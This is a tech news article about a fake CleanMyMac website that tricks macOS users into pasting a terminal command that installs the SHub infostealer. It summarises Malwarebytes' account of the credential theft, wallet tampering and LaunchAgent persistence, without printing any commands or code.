- Fake CleanMyMac tool spreads SHub infostealer
- Attacks trick users into entering terminal commands
- Malware steals credentials, crypto and continues via backdoor
A fake utility tricked MacOS users into installing an infostealer malware that exfiltrates passwords, sensitive files and even money, experts have warned.
Security researchers Malwarebytes said the program was part of a wider, highly sophisticated campaign which also included a custom website, reputable brand spoofing, a loader and the good old ClickFix approach.
The researchers said the campaign spoofed CleanMyMac, a legitimate mac optimization program built by MacPaw, and created a nearly identical site at cleanmymacos[DOT]org domain, making it easy for people to mistake it for the real thing. But instead of simply downloading and running an installer, victims are prompted to open a terminal and insert a command that retrieves the payload from a third-party server.
The article continues below
Steal files and establish persistence
“Instead of exploiting a vulnerability, it tricks the user into running the malware themselves,” Malwarebytes explained. “Because the command is executed voluntarily, protections such as Gatekeeper, notarization checks, and XProtect offer little protection once the user enters the command and presses Return.”
The malware installed this way is called SHub, and during installation it will ask the victim for their macOS password. Since the entire installation process is somewhat unorthodox and could look like something a superuser would do, users may dismiss it as standard practice, the researchers explained.
However, the password actually gives SHub access to the macOS keychain, Wi-Fi credentials, app tokens, and other private keys.
“With the password in hand, SHub begins a systematic scan of the machine,” the Malwarebytes researchers said.
After stealing passwords, cookies, autofill data, crypto wallet extensions, iCloud account data, Telegram session files and other valuables, it drops a phase two backdoor that replaces some cryptocurrency wallet apps with malicious copies. That way, the malware maintains persistence and even enables further crypto theft down the line.
Finally, the crooks would install a LaunchAgent by spoofing a Google update service.
“In practice, this allows the attackers to run commands on the infected Mac at any time until the persistence mechanism is discovered and removed,” the report concluded.
The best antivirus for all budgets
Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews and opinions in your feeds. Be sure to click the Follow button!
And of course you can too follow TechRadar on TikTok for news, reviews, video unboxings, and get regular updates from us on WhatsApp also.
